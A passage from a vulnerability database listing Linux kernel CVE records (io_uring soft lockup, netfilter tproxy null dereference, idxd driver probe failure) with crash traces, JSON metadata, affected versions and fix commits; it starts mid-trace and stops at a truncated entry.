[ 253.544471] RAX: 1ffff1105b175e00 RBX: ffffffffa13ef09a RCX: 00000000a13ef001
[ 253.544474] RDX: ffffffffa13ef09a RSI: ffff8882d8baf558 RDI: ffffffffa13ef09a
[ 253.544476] RBP: ffff8882d8baf4d8 R08: ffff8882d8baf5e0 R09: 0000000000000004
[ 253.544479] R10: ffff8882d8baf5e8 R11: ffffffffa0d59a50 R12: ffff8882eab20380
[ 253.544481] R13: ffffffffa0d59a50 R14: dffffc0000000000 R15: 1ffff1105b175eb0
[ 253.544483] FS: 00000000016d3380(0000) GS:ffff88af48c00000(0000) knlGS:0000000000000000
[ 253.544486] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 253.544488] CR2: 00000000004af0f0 CR3: 00000002eabfa004 CR4: 00000000003706e0
[ 253.544491] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 253.544492] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 253.544494] Call Trace:
[ 253.544496] <TASK>
[ 253.544498] ? io_queue_sqe (fs/io_uring.c:7143)
[ 253.544505] __kernel_text_address (kernel/extable.c:78)
[ 253.544508] unwind_get_return_address (arch/x86/kernel/unwind_frame.c:19)
[ 253.544514] arch_stack_walk (arch/x86/kernel/stacktrace.c:27)
[ 253.544517] ? io_queue_sqe (fs/io_uring.c:7143)
[ 253.544521] stack_trace_save (kernel/stacktrace.c:123)
[ 253.544527] ____kasan_kmalloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:515)
[ 253.544531] ? ____kasan_kmalloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:515)
[ 253.544533] ? __kasan_kmalloc (mm/kasan/common.c:524)
[ 253.544535] ? kmem_cache_alloc_trace (./include/linux/kasan.h:270 mm/slab.c:3567)
[ 253.544541] ? io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)
[ 253.544544] ? __io_queue_sqe (fs/io_uring.c:?)
[ 253.544551] __kasan_kmalloc (mm/kasan/common.c:524)
[ 253.544553] kmem_cache_alloc_trace (./include/linux/kasan.h:270 mm/slab.c:3567)
[ 253.544556] ? io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)
[ 253.544560] io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)
[ 253.544564] ? __kasan_slab_alloc (mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:469)
[ 253.544567] ? __kasan_slab_alloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:469)
[ 253.544569] ? kmem_cache_alloc_bulk (mm/slab.h:732 mm/slab.c:3546)
[ 253.544573] ? __io_alloc_req_refill (fs/io_uring.c:2078)
[ 253.544578] ? io_submit_sqes (fs/io_uring.c:7441)
[ 253.544581] ? __se_sys_io_uring_enter (fs/io_uring.c:10154 fs/io_uring.c:10096)
[ 253.544584] ? __x64_sys_io_uring_enter (fs/io_uring.c:10096)
[ 253.544587] ? do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
[ 253.544590] ? entry_SYSCALL_64_after_hwframe (??:?)
[ 253.544596] __io_queue_sqe (fs/io_uring.c:?)
[ 253.544600] io_queue_sqe (fs/io_uring.c:7143)
[ 253.544603] io_submit_sqe (fs/io_uring.c:?)
[ 253.544608] io_submit_sqes (fs/io_uring.c:?)
[ 253.544612] __se_sys_io_uring_enter (fs/io_uring.c:10154 fs/io_uri
---truncated---
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48937",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:30.798795Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:09.380Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/io_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4a93c6594613c3429b6f30136fff115c7f803af4",
"status": "affected",
"version": "ddf0322db79c5984dc1a1db890f946dd19b7d6d9",
"versionType": "git"
},
{
"lessThan": "c718ea4e7382e18957ed0e88a5f855e2122d9c00",
"status": "affected",
"version": "ddf0322db79c5984dc1a1db890f946dd19b7d6d9",
"versionType": "git"
},
{
"lessThan": "8f3cc3c5bc43d03b5748ac4fb8d180084952c36a",
"status": "affected",
"version": "ddf0322db79c5984dc1a1db890f946dd19b7d6d9",
"versionType": "git"
},
{
"lessThan": "f240762f88b4b1b58561939ffd44837759756477",
"status": "affected",
"version": "ddf0322db79c5984dc1a1db890f946dd19b7d6d9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/io_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: add a schedule point in io_add_buffers()\n\nLooping ~65535 times doing kmalloc() calls can trigger soft lockups,\nespecially with DEBUG features (like KASAN).\n\n[ 253.536212] watchdog: BUG: soft lockup - CPU#64 stuck for 26s! [b219417889:12575]\n[ 253.544433] Modules linked in: vfat fat i2c_mux_pca954x i2c_mux spidev cdc_acm xhci_pci xhci_hcd sha3_generic gq(O)\n[ 253.544451] CPU: 64 PID: 12575 Comm: b219417889 Tainted: G S O 5.17.0-smp-DEV #801\n[ 253.544457] RIP: 0010:kernel_text_address (./include/asm-generic/sections.h:192 ./include/linux/kallsyms.h:29 kernel/extable.c:67 kernel/extable.c:98)\n[ 253.544464] Code: 0f 93 c0 48 c7 c1 e0 63 d7 a4 48 39 cb 0f 92 c1 20 c1 0f b6 c1 5b 5d c3 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 53 48 89 fb \u003c48\u003e c7 c0 00 00 80 a0 41 be 01 00 00 00 48 39 c7 72 0c 48 c7 c0 40\n[ 253.544468] RSP: 0018:ffff8882d8baf4c0 EFLAGS: 00000246\n[ 253.544471] RAX: 1ffff1105b175e00 RBX: ffffffffa13ef09a RCX: 00000000a13ef001\n[ 253.544474] RDX: ffffffffa13ef09a RSI: ffff8882d8baf558 RDI: ffffffffa13ef09a\n[ 253.544476] RBP: ffff8882d8baf4d8 R08: ffff8882d8baf5e0 R09: 0000000000000004\n[ 253.544479] R10: ffff8882d8baf5e8 R11: ffffffffa0d59a50 R12: ffff8882eab20380\n[ 253.544481] R13: ffffffffa0d59a50 R14: dffffc0000000000 R15: 1ffff1105b175eb0\n[ 253.544483] FS: 00000000016d3380(0000) GS:ffff88af48c00000(0000) knlGS:0000000000000000\n[ 253.544486] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 253.544488] CR2: 00000000004af0f0 CR3: 00000002eabfa004 CR4: 00000000003706e0\n[ 253.544491] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 253.544492] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 253.544494] Call Trace:\n[ 253.544496] \u003cTASK\u003e\n[ 253.544498] ? io_queue_sqe (fs/io_uring.c:7143)\n[ 253.544505] __kernel_text_address (kernel/extable.c:78)\n[ 253.544508] unwind_get_return_address (arch/x86/kernel/unwind_frame.c:19)\n[ 253.544514] arch_stack_walk (arch/x86/kernel/stacktrace.c:27)\n[ 253.544517] ? io_queue_sqe (fs/io_uring.c:7143)\n[ 253.544521] stack_trace_save (kernel/stacktrace.c:123)\n[ 253.544527] ____kasan_kmalloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:515)\n[ 253.544531] ? ____kasan_kmalloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:515)\n[ 253.544533] ? __kasan_kmalloc (mm/kasan/common.c:524)\n[ 253.544535] ? kmem_cache_alloc_trace (./include/linux/kasan.h:270 mm/slab.c:3567)\n[ 253.544541] ? io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)\n[ 253.544544] ? __io_queue_sqe (fs/io_uring.c:?)\n[ 253.544551] __kasan_kmalloc (mm/kasan/common.c:524)\n[ 253.544553] kmem_cache_alloc_trace (./include/linux/kasan.h:270 mm/slab.c:3567)\n[ 253.544556] ? io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)\n[ 253.544560] io_issue_sqe (fs/io_uring.c:4556 fs/io_uring.c:4589 fs/io_uring.c:6828)\n[ 253.544564] ? __kasan_slab_alloc (mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:469)\n[ 253.544567] ? __kasan_slab_alloc (mm/kasan/common.c:39 mm/kasan/common.c:45 mm/kasan/common.c:436 mm/kasan/common.c:469)\n[ 253.544569] ? kmem_cache_alloc_bulk (mm/slab.h:732 mm/slab.c:3546)\n[ 253.544573] ? __io_alloc_req_refill (fs/io_uring.c:2078)\n[ 253.544578] ? io_submit_sqes (fs/io_uring.c:7441)\n[ 253.544581] ? __se_sys_io_uring_enter (fs/io_uring.c:10154 fs/io_uring.c:10096)\n[ 253.544584] ? __x64_sys_io_uring_enter (fs/io_uring.c:10096)\n[ 253.544587] ? do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n[ 253.544590] ? entry_SYSCALL_64_after_hwframe (??:?)\n[ 253.544596] __io_queue_sqe (fs/io_uring.c:?)\n[ 253.544600] io_queue_sqe (fs/io_uring.c:7143)\n[ 253.544603] io_submit_sqe (fs/io_uring.c:?)\n[ 253.544608] io_submit_sqes (fs/io_uring.c:?)\n[ 253.544612] __se_sys_io_uring_enter (fs/io_uring.c:10154 fs/io_uri\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:30.623Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4a93c6594613c3429b6f30136fff115c7f803af4"
},
{
"url": "https://git.kernel.org/stable/c/c718ea4e7382e18957ed0e88a5f855e2122d9c00"
},
{
"url": "https://git.kernel.org/stable/c/8f3cc3c5bc43d03b5748ac4fb8d180084952c36a"
},
{
"url": "https://git.kernel.org/stable/c/f240762f88b4b1b58561939ffd44837759756477"
}
],
"title": "io_uring: add a schedule point in io_add_buffers()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48937",
"datePublished": "2024-08-22T03:31:32.165Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:30.623Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36270 (GCVE-0-2024-36270)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: tproxy: bail out if IP has been disabled on the device
syzbot reports:
general protection fault, probably for non-canonical address 0xdffffc0000000003: 0000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000018-0x000000000000001f]
[..]
RIP: 0010:nf_tproxy_laddr4+0xb7/0x340 net/ipv4/netfilter/nf_tproxy_ipv4.c:62
Call Trace:
nft_tproxy_eval_v4 net/netfilter/nft_tproxy.c:56 [inline]
nft_tproxy_eval+0xa9a/0x1a00 net/netfilter/nft_tproxy.c:168
__in_dev_get_rcu() can return NULL, so check for this.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb Version: cc6eb433856983e91071469c4ce57accb6947ccb |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:37:04.470Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10f0af5234dafd03d2b75233428ec3f11cf7e43d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07eeedafc59c45fe5de43958128542be3784764c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fe5af4ff06db3d4d80e07a19356640428159f03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/caf3a8afb5ea00db6d5398adf148d5534615fd80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/570b4c52096e62fda562448f5760fd0ff06110f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/819bfeca16eb9ad647ddcae25e7e12c30612147c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21a673bddc8fd4873c370caf9ae70ffc6d47e8d3"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36270",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:41.037239Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:46.135Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/netfilter/nf_tproxy_ipv4.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "10f0af5234dafd03d2b75233428ec3f11cf7e43d",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "07eeedafc59c45fe5de43958128542be3784764c",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "6fe5af4ff06db3d4d80e07a19356640428159f03",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "caf3a8afb5ea00db6d5398adf148d5534615fd80",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "570b4c52096e62fda562448f5760fd0ff06110f0",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "819bfeca16eb9ad647ddcae25e7e12c30612147c",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
},
{
"lessThan": "21a673bddc8fd4873c370caf9ae70ffc6d47e8d3",
"status": "affected",
"version": "cc6eb433856983e91071469c4ce57accb6947ccb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/netfilter/nf_tproxy_ipv4.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.37"
},
{
"lessThan": "2.6.37",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: tproxy: bail out if IP has been disabled on the device\n\nsyzbot reports:\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000003: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000018-0x000000000000001f]\n[..]\nRIP: 0010:nf_tproxy_laddr4+0xb7/0x340 net/ipv4/netfilter/nf_tproxy_ipv4.c:62\nCall Trace:\n nft_tproxy_eval_v4 net/netfilter/nft_tproxy.c:56 [inline]\n nft_tproxy_eval+0xa9a/0x1a00 net/netfilter/nft_tproxy.c:168\n\n__in_dev_get_rcu() can return NULL, so check for this."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:00.764Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/10f0af5234dafd03d2b75233428ec3f11cf7e43d"
},
{
"url": "https://git.kernel.org/stable/c/07eeedafc59c45fe5de43958128542be3784764c"
},
{
"url": "https://git.kernel.org/stable/c/6fe5af4ff06db3d4d80e07a19356640428159f03"
},
{
"url": "https://git.kernel.org/stable/c/caf3a8afb5ea00db6d5398adf148d5534615fd80"
},
{
"url": "https://git.kernel.org/stable/c/570b4c52096e62fda562448f5760fd0ff06110f0"
},
{
"url": "https://git.kernel.org/stable/c/819bfeca16eb9ad647ddcae25e7e12c30612147c"
},
{
"url": "https://git.kernel.org/stable/c/21a673bddc8fd4873c370caf9ae70ffc6d47e8d3"
}
],
"title": "netfilter: tproxy: bail out if IP has been disabled on the device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36270",
"datePublished": "2024-06-21T10:18:07.026Z",
"dateReserved": "2024-06-21T10:13:16.302Z",
"dateUpdated": "2025-05-04T09:11:00.764Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48868 (GCVE-0-2022-48868)
Vulnerability from cvelistv5
Published
2024-08-21 06:09
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: idxd: Let probe fail when workqueue cannot be enabled
The workqueue is enabled when the appropriate driver is loaded and
disabled when the driver is removed. When the driver is removed it
assumes that the workqueue was enabled successfully and proceeds to
free allocations made during workqueue enabling.
Failure during workqueue enabling does not prevent the driver from
being loaded. This is because the error path within drv_enable_wq()
returns success unless a second failure is encountered
during the error path. By returning success it is possible to load
the driver even if the workqueue cannot be enabled and
allocations that do not exist are attempted to be freed during
driver remove.
Some examples of problematic flows:
(a)
idxd_dmaengine_drv_probe() -> drv_enable_wq() -> idxd_wq_request_irq():
In above flow, if idxd_wq_request_irq() fails then
idxd_wq_unmap_portal() is called on error exit path, but
drv_enable_wq() returns 0 because idxd_wq_disable() succeeds. The
driver is thus loaded successfully.
idxd_dmaengine_drv_remove()->drv_disable_wq()->idxd_wq_unmap_portal()
Above flow on driver unload triggers the WARN in devm_iounmap() because
the device resource has already been removed during error path of
drv_enable_wq().
(b)
idxd_dmaengine_drv_probe() -> drv_enable_wq() -> idxd_wq_request_irq():
In above flow, if idxd_wq_request_irq() fails then
idxd_wq_init_percpu_ref() is never called to initialize the percpu
counter, yet the driver loads successfully because drv_enable_wq()
returns 0.
idxd_dmaengine_drv_remove()->__idxd_wq_quiesce()->percpu_ref_kill():
Above flow on driver unload triggers a BUG when attempting to drop the
initial ref of the uninitialized percpu ref:
BUG: kernel NULL pointer dereference, address: 0000000000000010
Fix the drv_enable_wq() error path by returning the original error that
indicates failure of workqueue enabling. This ensures that the probe
fails when an error is encountered and the driver remove paths are only
attempted when the workqueue was enabled successfully.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48868",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:38.503495Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:54.625Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/idxd/device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0f150134dd795ffcd60b798a85ab737d8d010fb7",
"status": "affected",
"version": "1f2bb40337f0df1d9af80793e9fdacff7706e654",
"versionType": "git"
},
{
"lessThan": "99dc4520b74e7ca8e9dc9abe37a0b10b49467960",
"status": "affected",
"version": "1f2bb40337f0df1d9af80793e9fdacff7706e654",
"versionType": "git"
},
{
"lessThan": "b51b75f0604f17c0f6f3b6f68f1a521a5cc6b04f",
"status": "affected",
"version": "1f2bb40337f0df1d9af80793e9fdacff7706e654",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/idxd/device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Let probe fail when workqueue cannot be enabled\n\nThe workqueue is enabled when the appropriate driver is loaded and\ndisabled when the driver is removed. When the driver is removed it\nassumes that the workqueue was enabled successfully and proceeds to\nfree allocations made during workqueue enabling.\n\nFailure during workqueue enabling does not prevent the driver from\nbeing loaded. This is because the error path within drv_enable_wq()\nreturns success unless a second failure is encountered\nduring the error path. By returning success it is possible to load\nthe driver even if the workqueue cannot be enabled and\nallocations that do not exist are attempted to be freed during\ndriver remove.\n\nSome examples of problematic flows:\n(a)\n\n idxd_dmaengine_drv_probe() -\u003e drv_enable_wq() -\u003e idxd_wq_request_irq():\n In above flow, if idxd_wq_request_irq() fails then\n idxd_wq_unmap_portal() is called on error exit path, but\n drv_enable_wq() returns 0 because idxd_wq_disable() succeeds. The\n driver is thus loaded successfully.\n\n idxd_dmaengine_drv_remove()-\u003edrv_disable_wq()-\u003eidxd_wq_unmap_portal()\n Above flow on driver unload triggers the WARN in devm_iounmap() because\n the device resource has already been removed during error path of\n drv_enable_wq().\n\n(b)\n\n idxd_dmaengine_drv_probe() -\u003e drv_enable_wq() -\u003e idxd_wq_request_irq():\n In above flow, if idxd_wq_request_irq() fails then\n idxd_wq_init_percpu_ref() is never called to initialize the percpu\n counter, yet the driver loads successfully because drv_enable_wq()\n returns 0.\n\n idxd_dmaengine_drv_remove()-\u003e__idxd_wq_quiesce()-\u003epercpu_ref_kill():\n Above flow on driver unload triggers a BUG when attempting to drop the\n initial ref of the uninitialized percpu ref:\n BUG: kernel NULL pointer dereference, address: 0000000000000010\n\nFix the drv_enable_wq() error path by returning the original error that\nindicates failure of workqueue enabling. This ensures that the probe\nfails when an error is encountered and the driver remove paths are only\nattempted when the workqueue was enabled successfully."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:08.433Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0f150134dd795ffcd60b798a85ab737d8d010fb7"
},
{
"url": "https://git.kernel.org/stable/c/99dc4520b74e7ca8e9dc9abe37a0b10b49467960"
},
{
"url": "https://git.kernel.org/stable/c/b51b75f0604f17c0f6f3b6f68f1a521a5cc6b04f"
}
],
"title": "dmaengine: idxd: Let probe fail when workqueue cannot be enabled",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48868",
"datePublished": "2024-08-21T06:09:58.431Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T08:25:08.433Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-23222 (GCVE-0-2022-23222)
Vulnerability from cvelistv5
Published
2022-01-14 00:00
Modified
2024-08-03 03:36
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
